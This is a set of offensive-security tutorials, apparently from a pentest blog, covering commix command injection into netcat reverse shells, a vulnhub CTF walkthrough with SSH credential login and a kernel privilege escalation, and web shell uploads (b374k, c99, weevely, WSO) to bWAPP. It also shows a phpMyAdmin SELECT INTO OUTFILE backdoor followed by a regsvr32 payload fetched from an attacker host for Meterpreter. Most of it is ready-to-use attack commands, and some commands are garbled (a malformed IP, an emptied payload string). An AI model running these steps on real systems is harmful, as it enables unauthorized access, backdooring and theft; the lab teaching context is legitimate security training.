Exploit Command Injection Vulnearbility with Commix and Netcat

Commix is an automated command injection tool. It lets you have a meterpreter or netcat session via command injection if the web application is vulnerable to it. It’s pretty efficient and reliable. Commix is widely used by security experts, penetration testers and also web developers in order find vulnerabilities. In this article we will learn how to get a netcat session using commix.

Requirements :

·        PentesterLab (for Linux testing)

·        Kali Linux

·        Commix

As you can see in the image below the environment of PentesterLab is vulnerable to command injection.

capture the cookies of pentesterlab in bursuite as shown in the image below :

Copy the contents of the cookies in a TXT file and use the following command to attack :

commix -r /root/Desktop/1.txt

As the exploitation is successful, it will ask you if you want to load the pseudo terminal or not. Type ‘y’ for the pseudo terminal and it will be loaded. Use the command ‘whoami’ to check the user as shown in the image :

Now that you are in the pseudo terminal, type the following set of command in order to generate reverse shell :

reverse_tcp

set lhost 192.168.1107

set lport 4321

After executing above commands, it will ask you if you want to have a netcat shell or other (meterpreter) shell. Choose option 1 as we will try to take a netcat session. Then choose option 1 to use default netcat settings for the target. Then type y to use /bin as your subdirectory.

Simultaneously, turn on the netcat listener by using the following command :

nc -lvp 4321

And as the execution of the steps go right, you will have  your session as shown in the image below :

Another method to get a netcat session is by using different settings of netcat. For this, repeat the above steps, but this time around, choose option 3 under the category of ‘unix-like targets’ for the traditional netcat settings.

Again, simultaneously start the netcat listener with the following command :

nc -lvp 1234

This way, you can use commix yet again to gain netcat session through various methods.

Hack the Gibson VM (CTF Challenge)

Hello friends!! Welcome to our next CTF challenge of the vulnhub called “Gibson” which is a boot to root challenge with ultimate goal to get the Flag and finish the task. This VM is design to test your penetration testing skills by spawning the root shell of this machine which is weak configured and author has asked to find the hidden flag through privilege escalation. You can download it from the given below link. I found this lab more interesting as it has involved cyber forensic in it to get the final flag.

Download it from here: https://www.vulnhub.com/entry/gibson-02,146/

Penetration Methodology

§  Network Scanning (Netdiscover, Nmap)

§  Abusing HTTP service for username & password

§  Spawning Pty shell SSH (Metasploit)

§  Privilege Escalation via Kernel exploit

§  Uploading LinEnum script

§  Obtain disk image

§  Forensic Analysis for extracting hidden flag.img

§  Decrypt GPG encrypted file using leet encoded value

§  Capture the Flag

Let’s start off with scanning the network to find our targets IP.

netdiscover

As our target IP is 192.168.1.100, now move to network enumeration and for this we are going to scan network IP using nmap which will show all the open ports.

nmap –p- -A 192.168.1.100

In this case open ports are only two i.e. 22 and 80 moreover it has found an html file.

As from the above result we have got 80 port open so we will open target IP in browser.

It shows an accessible html page. But when we try to open it, we cannot see any crucial information here. It’s written the result will be found by brute force but there is no place where we can apply brute force.

As we do not have any other option so let’s just go to page source code to see if we could get any clue to move further in our task.

Ohhh!! Great, there is something which is connecting to username and password, as per my prediction here god could be the possible password and margo could be the username.

Now from our nmap result we saw port 22 open for ssh login. So let’s try to login into ssh using above found credential and for this we will be taking help of Metasploit framework. By using the following module we can gain meterpreter session, once get successfully exploit.

use auxiliary/scanner/ssh/ssh_login

msf auxiliary(scanner/ssh/ssh_login) > set rhosts 192.168.1.100

msf auxiliary(scanner/ssh/ssh_login) > set username margo

msf auxiliary(scanner/ssh/ssh_login) >set password god

msf auxiliary(scanner/ssh/ssh_login) >exploit

Hmm!! That’s great we have compromised the target machine, and you will love to see that the default opened session is command shell session and further we had upgrade into meterpreter session. And then run “sysinfo” command to identify system architecture.

As it was Ubuntu 14.04 (linux 3.19.0-25-generic) so I search in Google for its kernel exploit for privilege escalation.

Luckily, I found this kernel was badly affected by Overlayfs - A Local Privilege Escalation. Superb the metasploit has in-built module for this exploit.

use exploit/linux/local/overlayfs_priv_esc

msf exploit(linux/local/overlayfs_priv_esc) > set session 1

msf exploit(linux/local/overlayfs_priv_esc) > set lhost 192.168.1.109

msf exploit(linux/local/overlayfs_priv_esc) > exploit

Here again you will love to see that the default opened session is command shell session and further we had upgrade into meterpreter session.

sessions -u 3

Now let’s upload LinEnum which is a scripted Local Linux Enumeration & Privilege Escalation Checks Shellscript that enumerates the system configuration and high-level summary of the checks/tasks performed by LinEnum.

To more about LinEnum script visit given below link:

https://www.hackingarticles.in/linux-privilege-escalation-via-automated-script/

upload /root/pentest/privs/LinEnum.sh .

chmod 777 LinEnum.sh

./LinEnum.sh

Here we get some interesting file which is highlighted in below image. It shows some external server is running.

Now from the process list we see something like ftpserv so we can just search for file based on that.

find / -name ftpserv*

Awesome it gives us “ftpserv.img” file which can prove to be a useful thing, let’s download it in our local machine with the help of following command.

download /var/lib/libvirt/images/ftpserv.img /root/Desktop/

So let’s check out what type of file it is?  With the help of file command, it shown the complete detail of the image file and hence by this, we came to know that this image file belong to partition boot sector that contains all information of file system uses to access the volume.

Now let’s find out partition table of the device along with give sizes in sector with the help of following command

fdisk -lu ftpserv.img

Wonderful! It is a FAT16 file system and as we have enter into forensic phase, therefore you should have a little knowledge of cyber forensic. So we are going use Sleuth kit which is a command line forensic analysis tool kit to extract List file and directory names from this image with the help of following command.

fls -f fat16 -o 63 ftpserv.img

Hmmm!! Here I found something very interesting a “garbage” folder, let’s explore this by executing below command.

fls -f fat16 -o 63 ftpserv.img 12

Awesome!! It was good to see an image file “flag.img” along with its inode number. An inode number holds metadata and I’m pretty sure that we will tacked that information from inside the flag.img. Let’s extract all content of ftpserv.img in flag.img and then mount it.

icat -f fat16 -o 63 ftpserv.img 845580 > flag.img

mount flag.img /mnt

cd /mnt

ls

Booom!! Here I saw the very interesting file “hint.txt” which is holding two links.

So when I visit both link then I found “jonnny lee miller” is common character in both links and in hacker movie he is called by “zero Cool”.

Then we explored more and found the hidden directory /.trash which holds and encrypted file flag.txt.gpg but “zero Cool” wasn’t the correct passphrase and it tooks almost whole day to decrypt it.

At last I thought from the hacker’s vision and encode the “zero Cool” into leet function but unfortunately I was unable to decrypt the encrypted file with the help of Z3r0C00l.

But finally, obtain the correct passphrase Z3r0K00l by replacing C alphabet from K and execute the following command to decrypt gpg encryption.

gpg --passphrase Z3r0K00l flag.txt.gpg

Hurray!! We successfully decrypted the file and obtain flag.txt file. 

Web Shells Penetration Testing (Begineer Guide)

 Through this article I would like to share file uploading using different type web shell scripts on a web server and try to get unauthorized access in the server.

Web shells are the scripts that are coded in different languages like PHP, Python, ASP, Perl and many other languages which further use as backdoor for unauthorized access in any server by uploading it on a web server.

Once the shell get uploaded on the target location, the attacker may able to perform the read and write operation directly, he will be able to edit any file or delete the file from the server.

Attacker: Kali Linux

Target: Bwapp

Let’s begin!!!

B374k script

Open terminal and type following command to download b374k script from github.

Git clone https://github.com/b374k/b374k

This is a PHP shell which provides reveres connection to the attacker machine and where he can execute the command to retrieve victim’s information.

Following command will create a malicious file shell.php as the backdoor shell with password raj123.

Php –f index.php -- -o shell.php –p raj123

Now let’s open the target IP in browser: 192.168.1.103:81/bWAPP/login.php. Enter user and password as bee and bug respectively.

Set security level low, from list box chooses your bug select Unrestricted File Upload now and click on hack.

Here you can see the web server allow us to upload an image under the web page of unrestricted file upload.

Click on browse to upload the shell.php in the web server and then click on upload.

Now you can read the message from the screenshot that”image has been uploaded here” which means our php backdoor is uploaded successfully. Now click on the link “here”.

Here required password to execute shell.php and I had given raj123 as its password.

From given screenshot you can see, we are inside the directory of images.

Click on terminal tab from menu bar of b374k which will provide victims terminal to execute the desired commands. From given image you can read the command which I have executed.

Lsb_release -a

Now I will connect b347k shell from netcat and try to access victim’s shell. Open the terminal in kali Linux and type following command for netcat.

Nc 192.168.0.103 8888

Inside shell b347k from menu select network option to open bind connection give IP of target: 192.168.0.103 as server IP and port 8888 now scroll down the list and select Perl then click on run.

This will give you reverse connection on netcat and from the given screenshot you can read the victim information which I have got when I execute the following commands.

Whoami

Cat/etc/passwd

C99shell script

Download c99shell from the given link

https://github.com/tennc/webshell/tree/master/php/PHPshell/c99shell

C99shell is a PHP backdoor which provides details of files and folders when it get uploaded and let you perform command execution through it.

This time again open web server IP in the browser to upload the c99shell.php

Here you can read the message from the screenshot that”image has been uploaded here” which means our php backdoor is uploaded successfully. Now click on the link “here”.

Here our php malicious file is executed where it is dumping the names of 25 files. From screenshot you can see all files under images directory are jpg, png, gif images.

Now select bind option from menu to connect host from netcat. Repeat the same process to run netcat at the background and then give host IP: 192.168.0.103 and port: 8888 select using Perl and click on connect.

This  will give you reverse connection on netcat.

Weevely Web Shell

Weevely is a command line web shell dynamically extended over the network at runtime, designed for remote server administration and penetration testing.

Its terminal executes arbitrary remote code through the small footprint PHP agent that sits on the HTTP server. Over 30 modules shapes an adaptable web administration and post-exploitation backdoor for access maintenance, privilege escalation and network lateral movement, even in restricted environment.

Open the terminal and type following command which will create a web shell as backdoor.php on the Desktop with password pass.

weevely generate raj123 /root/Desktop/weevely.php

Open the target location where you want to upload your backdoor. Now I am going to browse weevely.php and then click on upload to upload your web shell. Now you can see from the given screenshot the weevely.php has been successfully uploaded.

Make right click on the link “here” and click on copy link location.

Again type following command to start the attack on the web server and post above copied URL with password raj123 inside the weevely command.

weevely http://192.168.1.103:81/bWAPP/images/weevely.php raj123

Now you can see that I have got victim shell through Weevely. Now type following command to retrieve victim’s information.

Whoami

Cat/etc/password

Type help in front of weevely which will show all module present inside it.

WSO script

Download this script from given link.

https://cloud.github.com/downloads/orbweb/PHP-SHELL-WSO/wso2.5.1.php

This also a PHP script which is quite similar to c99shell.php & b347k.php shells and perform same function as c99 script.

Again repeat the same process to upload wso2.5.1.php script inside the bwapp then click on link “here”.

After executing the shell, you will see it has retrieved the basic information of target and dump the files and folder names.

Now all options are same as above, now try yourself to connect this shell with netcat.

Shell Uploading in Web Server through PhpMyAdmin

In this tutorial we will learn how to exploit a web server if we found phpmyadmin panel has been left open. Here I will try to exploit phpmyadmin which is running inside the localhost “xampp” by generating a SQL query to execute malicious code and then make an effort to access the shell of victim’s Pc.

PhpMyAdmin is a free software tool written in PHP, intended to handle the administration of MySQL over the Web. phpMyAdmin supports a wide range of operations on MySQL and MariaDB. Frequently used operations (managing databases, tables, columns, relations, indexes, users, permissions, etc) can be performed via the user interface, while you still have the ability to directly execute any SQL statement.

Features

·         Intuitive web interface

·         Support for most MySQL features:

·         browse and drop databases, tables, views, fields and indexes

·         create, copy, drop, rename and alter databases, tables, fields and indexes

·         maintenance server, databases and tables, with proposals on server configuration

·         execute, edit and bookmark any SQL-statement, even batch-queries

·         manage MySQL user accounts and privileges

·         manage stored procedures and triggers

·         Import data from CSV and SQL

·         Export data to various formats: CSV, SQL, XML, PDF, ISO/IEC 26300 - OpenDocument Text and Spreadsheet, Word, L^AT_EX and others

·         Administering multiple servers

·         Creating graphics of your database layout in various formats

·         Creating complex queries using Query-by-example (QBE)

·         Searching globally in a database or a subset of it

·         Transforming stored data into any format using a set of predefined functions, like displaying BLOB-data as image or download-link

For information visit: https://www.phpmyadmin.net

Lets start!!!

Open the localhost address:192.168.1.101:81 in the browser and select the option phpmyadmin from the given list of xampp as shown the following screenshot.

When you come into PhpMyAdmin application, here you will find different areas. On the left side of the screen you can see the list of database names. As we are inside the administration console where we can perform multiple tasks which I have defined above therefore I am going to create a new database

Now click on new to create a database.

Give name to your database as I have given Ignite technologies and click on create.

Now you can see the database ignite technologies has been added in the list of databases.

Click on ignite technologies database to construct MYSQL query inside your database. Hence click on SQL tab where you can enter the SQL query code.

Now this is interesting part because here I am going to execute a malicious code as SQL query which will create a command shell vulnerability inside the web server. 

SELECT "" into outfile "C:\\xampp\\htdocs\\backdoor.php"

In the following screenshot you can see I have given above malicious php code as SQL query and then click on GO tab to execute it.

Now type following URL to find whether we are successful or not in order to create OS command shell vulnerability.

http://192.168.1.101:81/backdoor.php

Awesome!!!  You can see it has given warning which means we had successfully created OS command shell vulnerability.

http://192.168.1.101:81/backdoor.php?cmd=dir

When you execute above URL in the browser you will get the information of victim‘s PC directories.

Next step will to achieve meterpreter session of victim’s Pc.

Open other terminal in kali Linux and type following command.

msfconsole

msf > use exploit/windows/misc/regsvr32_applocker_bypass_server

msf exploit(regsvr32_applocker_bypass_server) > set lhost 192.168.1.104

msf exploit(regsvr32_applocker_bypass_server) > set lport 4444

msf exploit(regsvr32_applocker_bypass_server) > exploit

Copy the selected part for dll file and use this malicious code as the command inside the URL.

regsvr32 /s /n /u / i:http://192.168.1.104:8080/sVW72p3IRZBScv.sct%20scrobj.dll

Paste the above code the URL and execute it which will give meterpreter session on metasploit

http://192.168.1.101:81/backdoor.php?cmd= regsvr32 /s /n /u / i:http://192.168.1.104:8080/sVW72p3IRZBScv.sct%20scrobj.dll

From following screenshot you can see meterpreter session 1 opened.

Sessions –i 1

Meterpreter>sysinfo